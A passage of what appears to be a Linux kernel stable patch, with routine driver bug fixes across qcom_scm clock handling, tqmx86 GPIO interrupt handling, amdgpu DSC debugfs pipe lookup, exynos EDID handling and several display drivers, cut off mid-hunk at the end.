+index 916d2fc28b9c1..39bfbd120e0bc 100644
+--- a/drivers/clk/sifive/sifive-prci.c
++++ b/drivers/clk/sifive/sifive-prci.c
+@@ -4,7 +4,6 @@
+  * Copyright (C) 2020 Zong Li
+  */
+ 
+-#include <linux/clkdev.h>
+ #include <linux/delay.h>
+ #include <linux/io.h>
+ #include <linux/of_device.h>
+@@ -536,13 +535,6 @@ static int __prci_register_clocks(struct device *dev, struct __prci_data *pd,
+ 			return r;
+ 		}
+ 
+-		r = clk_hw_register_clkdev(&pic->hw, pic->name, dev_name(dev));
+-		if (r) {
+-			dev_warn(dev, "Failed to register clkdev for %s: %d\n",
+-				 init.name, r);
+-			return r;
+-		}
+-
+ 		pd->hw_clks.hws[i] = &pic->hw;
+ 	}
+ 
+diff --git a/drivers/dma/dma-axi-dmac.c b/drivers/dma/dma-axi-dmac.c
+index f30dabc99795d..176cf3665a185 100644
+--- a/drivers/dma/dma-axi-dmac.c
++++ b/drivers/dma/dma-axi-dmac.c
+@@ -1036,8 +1036,8 @@ static int axi_dmac_remove(struct platform_device *pdev)
+ {
+ 	struct axi_dmac *dmac = platform_get_drvdata(pdev);
+ 
+-	of_dma_controller_free(pdev->dev.of_node);
+ 	free_irq(dmac->irq, dmac);
++	of_dma_controller_free(pdev->dev.of_node);
+ 	tasklet_kill(&dmac->chan.vchan.task);
+ 	dma_async_device_unregister(&dmac->dma_dev);
+ 	clk_disable_unprepare(dmac->clk);
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index 58f1a86065dc9..619cd6548cf64 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -495,13 +495,14 @@ int qcom_scm_pas_init_image(u32 peripheral, const void *metadata, size_t size,
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	desc.args[1] = mdata_phys;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+-
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ out:
+@@ -563,10 +564,12 @@ int qcom_scm_pas_mem_setup(u32 peripheral, phys_addr_t addr, phys_addr_t size)
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ 	return ret ? : res.result[0];
+@@ -598,10 +601,12 @@ int qcom_scm_pas_auth_and_reset(u32 peripheral)
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ 	return ret ? : res.result[0];
+@@ -632,11 +637,12 @@ int qcom_scm_pas_shutdown(u32 peripheral)
+ 
+ 	ret = qcom_scm_bw_enable();
+ 	if (ret)
+-		return ret;
++		goto disable_clk;
+ 
+ 	ret = qcom_scm_call(__scm->dev, &desc, &res);
+-
+ 	qcom_scm_bw_disable();
++
++disable_clk:
+ 	qcom_scm_clk_disable();
+ 
+ 	return ret ? : res.result[0];
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index 700f71c954956..b23ef29f56020 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -1416,7 +1416,7 @@ config GPIO_TPS68470
+ 	  are "output only" GPIOs.
+ 
+ config GPIO_TQMX86
+-	tristate "TQ-Systems QTMX86 GPIO"
++	tristate "TQ-Systems TQMx86 GPIO"
+ 	depends on MFD_TQMX86 || COMPILE_TEST
+ 	depends on HAS_IOPORT_MAP
+ 	select GPIOLIB_IRQCHIP
+diff --git a/drivers/gpio/gpio-tqmx86.c b/drivers/gpio/gpio-tqmx86.c
+index e739dcea61b23..f2e7e8754d95d 100644
+--- a/drivers/gpio/gpio-tqmx86.c
++++ b/drivers/gpio/gpio-tqmx86.c
+@@ -6,6 +6,7 @@
+  *   Vadim V.Vlasov <vvlasov@dev.rtsoft.ru>
+  */
+ 
++#include <linux/bitmap.h>
+ #include <linux/bitops.h>
+ #include <linux/errno.h>
+ #include <linux/gpio/driver.h>
+@@ -15,6 +16,7 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_runtime.h>
++#include <linux/seq_file.h>
+ #include <linux/slab.h>
+ 
+ #define TQMX86_NGPIO	8
+@@ -27,17 +29,25 @@
+ #define TQMX86_GPIIC	3	/* GPI Interrupt Configuration Register */
+ #define TQMX86_GPIIS	4	/* GPI Interrupt Status Register */
+ 
++#define TQMX86_GPII_NONE	0
+ #define TQMX86_GPII_FALLING	BIT(0)
+ #define TQMX86_GPII_RISING	BIT(1)
++/* Stored in irq_type as a trigger type, but not actually valid as a register
++ * value, so the name doesn't use "GPII"
++ */
++#define TQMX86_INT_BOTH		(BIT(0) | BIT(1))
+ #define TQMX86_GPII_MASK	(BIT(0) | BIT(1))
+ #define TQMX86_GPII_BITS	2
++/* Stored in irq_type with GPII bits */
++#define TQMX86_INT_UNMASKED	BIT(2)
+ 
+ struct tqmx86_gpio_data {
+ 	struct gpio_chip	chip;
+-	struct irq_chip		irq_chip;
+ 	void __iomem		*io_base;
+ 	int			irq;
++	/* Lock must be held for accessing output and irq_type fields */
+ 	raw_spinlock_t		spinlock;
++	DECLARE_BITMAP(output, TQMX86_NGPIO);
+ 	u8			irq_type[TQMX86_NGPI];
+ };
+ 
+@@ -64,15 +74,10 @@ static void tqmx86_gpio_set(struct gpio_chip *chip, unsigned int offset,
+ {
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(chip);
+ 	unsigned long flags;
+-	u8 val;
+ 
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	val = tqmx86_gpio_read(gpio, TQMX86_GPIOD);
+-	if (value)
+-		val |= BIT(offset);
+-	else
+-		val &= ~BIT(offset);
+-	tqmx86_gpio_write(gpio, val, TQMX86_GPIOD);
++	__assign_bit(offset, gpio->output, value);
++	tqmx86_gpio_write(gpio, bitmap_get_value8(gpio->output, 0), TQMX86_GPIOD);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
+ }
+ 
+@@ -107,21 +112,39 @@ static int tqmx86_gpio_get_direction(struct gpio_chip *chip,
+ 	return GPIO_LINE_DIRECTION_OUT;
+ }
+ 
++static void tqmx86_gpio_irq_config(struct tqmx86_gpio_data *gpio, int offset)
++	__must_hold(&gpio->spinlock)
++{
++	u8 type = TQMX86_GPII_NONE, gpiic;
++
++	if (gpio->irq_type[offset] & TQMX86_INT_UNMASKED) {
++		type = gpio->irq_type[offset] & TQMX86_GPII_MASK;
++
++		if (type == TQMX86_INT_BOTH)
++			type = tqmx86_gpio_get(&gpio->chip, offset + TQMX86_NGPO)
++				? TQMX86_GPII_FALLING
++				: TQMX86_GPII_RISING;
++	}
++
++	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
++	gpiic &= ~(TQMX86_GPII_MASK << (offset * TQMX86_GPII_BITS));
++	gpiic |= type << (offset * TQMX86_GPII_BITS);
++	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++}
++
+ static void tqmx86_gpio_irq_mask(struct irq_data *data)
+ {
+ 	unsigned int offset = (data->hwirq - TQMX86_NGPO);
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(
+ 		irq_data_get_irq_chip_data(data));
+ 	unsigned long flags;
+-	u8 gpiic, mask;
+-
+-	mask = TQMX86_GPII_MASK << (offset * TQMX86_GPII_BITS);
+ 
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
+-	gpiic &= ~mask;
+-	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++	gpio->irq_type[offset] &= ~TQMX86_INT_UNMASKED;
++	tqmx86_gpio_irq_config(gpio, offset);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
++
++	gpiochip_disable_irq(&gpio->chip, irqd_to_hwirq(data));
+ }
+ 
+ static void tqmx86_gpio_irq_unmask(struct irq_data *data)
+@@ -130,15 +153,12 @@ static void tqmx86_gpio_irq_unmask(struct irq_data *data)
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(
+ 		irq_data_get_irq_chip_data(data));
+ 	unsigned long flags;
+-	u8 gpiic, mask;
+ 
+-	mask = TQMX86_GPII_MASK << (offset * TQMX86_GPII_BITS);
++	gpiochip_enable_irq(&gpio->chip, irqd_to_hwirq(data));
+ 
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
+-	gpiic &= ~mask;
+-	gpiic |= gpio->irq_type[offset] << (offset * TQMX86_GPII_BITS);
+-	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++	gpio->irq_type[offset] |= TQMX86_INT_UNMASKED;
++	tqmx86_gpio_irq_config(gpio, offset);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
+ }
+ 
+@@ -149,7 +169,7 @@ static int tqmx86_gpio_irq_set_type(struct irq_data *data, unsigned int type)
+ 	unsigned int offset = (data->hwirq - TQMX86_NGPO);
+ 	unsigned int edge_type = type & IRQF_TRIGGER_MASK;
+ 	unsigned long flags;
+-	u8 new_type, gpiic;
++	u8 new_type;
+ 
+ 	switch (edge_type) {
+ 	case IRQ_TYPE_EDGE_RISING:
+@@ -159,19 +179,16 @@ static int tqmx86_gpio_irq_set_type(struct irq_data *data, unsigned int type)
+ 		new_type = TQMX86_GPII_FALLING;
+ 		break;
+ 	case IRQ_TYPE_EDGE_BOTH:
+-		new_type = TQMX86_GPII_FALLING | TQMX86_GPII_RISING;
++		new_type = TQMX86_INT_BOTH;
+ 		break;
+ 	default:
+ 		return -EINVAL; /* not supported */
+ 	}
+ 
+-	gpio->irq_type[offset] = new_type;
+-
+ 	raw_spin_lock_irqsave(&gpio->spinlock, flags);
+-	gpiic = tqmx86_gpio_read(gpio, TQMX86_GPIIC);
+-	gpiic &= ~((TQMX86_GPII_MASK) << (offset * TQMX86_GPII_BITS));
+-	gpiic |= new_type << (offset * TQMX86_GPII_BITS);
+-	tqmx86_gpio_write(gpio, gpiic, TQMX86_GPIIC);
++	gpio->irq_type[offset] &= ~TQMX86_GPII_MASK;
++	gpio->irq_type[offset] |= new_type;
++	tqmx86_gpio_irq_config(gpio, offset);
+ 	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
+ 
+ 	return 0;
+@@ -182,8 +199,8 @@ static void tqmx86_gpio_irq_handler(struct irq_desc *desc)
+ 	struct gpio_chip *chip = irq_desc_get_handler_data(desc);
+ 	struct tqmx86_gpio_data *gpio = gpiochip_get_data(chip);
+ 	struct irq_chip *irq_chip = irq_desc_get_chip(desc);
+-	unsigned long irq_bits;
+-	int i = 0;
++	unsigned long irq_bits, flags;
++	int i;
+ 	u8 irq_status;
+ 
+ 	chained_irq_enter(irq_chip, desc);
+@@ -192,6 +209,34 @@ static void tqmx86_gpio_irq_handler(struct irq_desc *desc)
+ 	tqmx86_gpio_write(gpio, irq_status, TQMX86_GPIIS);
+ 
+ 	irq_bits = irq_status;
++
++	raw_spin_lock_irqsave(&gpio->spinlock, flags);
++	for_each_set_bit(i, &irq_bits, TQMX86_NGPI) {
++		/*
++		 * Edge-both triggers are implemented by flipping the edge
++		 * trigger after each interrupt, as the controller only supports
++		 * either rising or falling edge triggers, but not both.
++		 *
++		 * Internally, the TQMx86 GPIO controller has separate status
++		 * registers for rising and falling edge interrupts. GPIIC
++		 * configures which bits from which register are visible in the
++		 * interrupt status register GPIIS and defines what triggers the
++		 * parent IRQ line. Writing to GPIIS always clears both rising
++		 * and falling interrupt flags internally, regardless of the
++		 * currently configured trigger.
++		 *
++		 * In consequence, we can cleanly implement the edge-both
++		 * trigger in software by first clearing the interrupt and then
++		 * setting the new trigger based on the current GPIO input in
++		 * tqmx86_gpio_irq_config() - even if an edge arrives between
++		 * reading the input and setting the trigger, we will have a new
++		 * interrupt pending.
++		 */
++		if ((gpio->irq_type[i] & TQMX86_GPII_MASK) == TQMX86_INT_BOTH)
++			tqmx86_gpio_irq_config(gpio, i);
++	}
++	raw_spin_unlock_irqrestore(&gpio->spinlock, flags);
++
+ 	for_each_set_bit(i, &irq_bits, TQMX86_NGPI)
+ 		generic_handle_domain_irq(gpio->chip.irq.domain,
+ 					  i + TQMX86_NGPO);
+@@ -226,6 +271,22 @@ static void tqmx86_init_irq_valid_mask(struct gpio_chip *chip,
+ 	clear_bit(3, valid_mask);
+ }
+ 
++static void tqmx86_gpio_irq_print_chip(struct irq_data *d, struct seq_file *p)
++{
++	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
++
++	seq_printf(p, gc->label);
++}
++
++static const struct irq_chip tqmx86_gpio_irq_chip = {
++	.irq_mask = tqmx86_gpio_irq_mask,
++	.irq_unmask = tqmx86_gpio_irq_unmask,
++	.irq_set_type = tqmx86_gpio_irq_set_type,
++	.irq_print_chip = tqmx86_gpio_irq_print_chip,
++	.flags = IRQCHIP_IMMUTABLE,
++	GPIOCHIP_IRQ_RESOURCE_HELPERS,
++};
++
+ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -259,7 +320,12 @@ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ 
+ 	tqmx86_gpio_write(gpio, (u8)~TQMX86_DIR_INPUT_MASK, TQMX86_GPIODD);
+ 
+-	platform_set_drvdata(pdev, gpio);
++	/*
++	 * Reading the previous output state is not possible with TQMx86 hardware.
++	 * Initialize all outputs to 0 to have a defined state that matches the
++	 * shadow register.
++	 */
++	tqmx86_gpio_write(gpio, 0, TQMX86_GPIOD);
+ 
+ 	chip = &gpio->chip;
+ 	chip->label = "gpio-tqmx86";
+@@ -277,14 +343,8 @@ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	if (irq > 0) {
+-		struct irq_chip *irq_chip = &gpio->irq_chip;
+ 		u8 irq_status;
+ 
+-		irq_chip->name = chip->label;
+-		irq_chip->irq_mask = tqmx86_gpio_irq_mask;
+-		irq_chip->irq_unmask = tqmx86_gpio_irq_unmask;
+-		irq_chip->irq_set_type = tqmx86_gpio_irq_set_type;
+-
+ 		/* Mask all interrupts */
+ 		tqmx86_gpio_write(gpio, 0, TQMX86_GPIIC);
+ 
+@@ -293,7 +353,7 @@ static int tqmx86_gpio_probe(struct platform_device *pdev)
+ 		tqmx86_gpio_write(gpio, irq_status, TQMX86_GPIIS);
+ 
+ 		girq = &chip->irq;
+-		girq->chip = irq_chip;
++		gpio_irq_chip_set_chip(girq, &tqmx86_gpio_irq_chip);
+ 		girq->parent_handler = tqmx86_gpio_irq_handler;
+ 		girq->num_parents = 1;
+ 		girq->parents = devm_kcalloc(&pdev->dev, 1,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+index ff7dd17ad0763..dd34dfcd5af76 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c
+@@ -1369,16 +1369,13 @@ static ssize_t dp_dsc_clock_en_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -1475,12 +1472,14 @@ static ssize_t dp_dsc_clock_en_write(struct file *f, const char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Get CRTC state
+@@ -1560,16 +1559,13 @@ static ssize_t dp_dsc_slice_width_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -1664,12 +1660,14 @@ static ssize_t dp_dsc_slice_width_write(struct file *f, const char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Safely get CRTC state
+@@ -1749,16 +1747,13 @@ static ssize_t dp_dsc_slice_height_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -1853,12 +1848,14 @@ static ssize_t dp_dsc_slice_height_write(struct file *f, const char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Get CRTC state
+@@ -1934,16 +1931,13 @@ static ssize_t dp_dsc_bits_per_pixel_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2035,12 +2029,14 @@ static ssize_t dp_dsc_bits_per_pixel_write(struct file *f, const char __user *bu
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx || !pipe_ctx->stream)
++	if (!pipe_ctx->stream)
+ 		goto done;
+ 
+ 	// Get CRTC state
+@@ -2114,16 +2110,13 @@ static ssize_t dp_dsc_pic_width_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2175,16 +2168,13 @@ static ssize_t dp_dsc_pic_height_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2251,16 +2241,13 @@ static ssize_t dp_dsc_chunk_size_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+@@ -2327,16 +2314,13 @@ static ssize_t dp_dsc_slice_bpg_offset_read(struct file *f, char __user *buf,
+ 
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		pipe_ctx = &aconnector->dc_link->dc->current_state->res_ctx.pipe_ctx[i];
+-		if (pipe_ctx && pipe_ctx->stream &&
+-		    pipe_ctx->stream->link == aconnector->dc_link)
++		if (pipe_ctx->stream &&
++		    pipe_ctx->stream->link == aconnector->dc_link &&
++		    pipe_ctx->stream->sink &&
++		    pipe_ctx->stream->sink == aconnector->dc_sink)
+ 			break;
+ 	}
+ 
+-	if (!pipe_ctx) {
+-		kfree(rd_buf);
+-		return -ENXIO;
+-	}
+-
+ 	dsc = pipe_ctx->stream_res.dsc;
+ 	if (dsc)
+ 		dsc->funcs->dsc_read_state(dsc, &dsc_state);
+diff --git a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+index 916f2c36bf2f7..e200decd00c6d 100644
+--- a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
++++ b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+@@ -259,7 +259,7 @@ komeda_component_get_avail_scaler(struct komeda_component *c,
+ 	u32 avail_scalers;
+ 
+ 	pipe_st = komeda_pipeline_get_state(c->pipeline, state);
+-	if (!pipe_st)
++	if (IS_ERR_OR_NULL(pipe_st))
+ 		return NULL;
+ 
+ 	avail_scalers = (pipe_st->active_comps & KOMEDA_PIPELINE_SCALERS) ^
+diff --git a/drivers/gpu/drm/bridge/panel.c b/drivers/gpu/drm/bridge/panel.c
+index 216af76d00427..cdfcdbecd4c80 100644
+--- a/drivers/gpu/drm/bridge/panel.c
++++ b/drivers/gpu/drm/bridge/panel.c
+@@ -306,9 +306,12 @@ EXPORT_SYMBOL(drm_panel_bridge_set_orientation);
+ 
+ static void devm_drm_panel_bridge_release(struct device *dev, void *res)
+ {
+-	struct drm_bridge **bridge = res;
++	struct drm_bridge *bridge = *(struct drm_bridge **)res;
+ 
+-	drm_panel_bridge_remove(*bridge);
++	if (!bridge)
++		return;
++
++	drm_bridge_remove(bridge);
+ }
+ 
+ /**
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_vidi.c b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+index fb941a8c99f0f..e17f9c5c9c90e 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_vidi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+@@ -309,6 +309,7 @@ static int vidi_get_modes(struct drm_connector *connector)
+ 	struct vidi_context *ctx = ctx_from_connector(connector);
+ 	struct edid *edid;
+ 	int edid_len;
++	int count;
+ 
+ 	/*
+ 	 * the edid data comes from user side and it would be set
+@@ -328,7 +329,11 @@ static int vidi_get_modes(struct drm_connector *connector)
+ 
+ 	drm_connector_update_edid_property(connector, edid);
+ 
+-	return drm_add_edid_modes(connector, edid);
++	count = drm_add_edid_modes(connector, edid);
++
++	kfree(edid);
++
++	return count;
+ }
+ 
+ static const struct drm_connector_helper_funcs vidi_connector_helper_funcs = {
+diff --git a/drivers/gpu/drm/exynos/exynos_hdmi.c b/drivers/gpu/drm/exynos/exynos_hdmi.c
+index be2d9cbaaef2e..b0913bc81fc1c 100644
+--- a/drivers/gpu/drm/exynos/exynos_hdmi.c
++++ b/drivers/gpu/drm/exynos/exynos_hdmi.c
+@@ -887,11 +887,11 @@ static int hdmi_get_modes(struct drm_connector *connector)
+ 	int ret;
+ 
+ 	if (!hdata->ddc_adpt)
+-		return 0;
++		goto no_edid;
+ 
+ 	edid = drm_get_edid(connector, hdata->ddc_adpt);
+ 	if (!edid)
+-		return 0;
++		goto no_edid;
+ 
+ 	hdata->dvi_mode = !connector->display_info.is_hdmi;
+ 	DRM_DEV_DEBUG_KMS(hdata->dev, "%s : width[%d] x height[%d]\n",
+@@ -906,6 +906,9 @@ static int hdmi_get_modes(struct drm_connector *connector)
+ 	kfree(edid);
+ 
+ 	return ret;
++
++no_edid:
++	return drm_add_modes_noedid(connector, 640, 480);
+ }
+ 
+ static int hdmi_find_phy_conf(struct hdmi_context *hdata, u32 pixel_clock)
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.h b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+index ea951e2f55b17..2c2be479acc1d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+@@ -295,7 +295,9 @@ bool i915_gem_object_has_iomem(const struct drm_i915_gem_object *obj);
+ static inline bool
+ i915_gem_object_is_shrinkable(const struct drm_i915_gem_object *obj)
+ {
+-	return i915_gem_object_type_has(obj, I915_GEM_OBJECT_IS_SHRINKABLE);
++	/* TODO: make DPT shrinkable when it has no bound vmas */
++	return i915_gem_object_type_has(obj, I915_GEM_OBJECT_IS_SHRINKABLE) &&
++		!obj->is_dpt;
+ }
+ 
+ static inline bool
+diff --git a/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c b/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c
+index ecc990ec1b952..f2973cd1a8aae 100644
+--- a/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c
++++ b/drivers/gpu/drm/i915/gt/intel_breadcrumbs.c
+@@ -258,8 +258,13 @@ static void signal_irq_work(struct irq_work *work)
+ 		i915_request_put(rq);
+ 	}
+ 
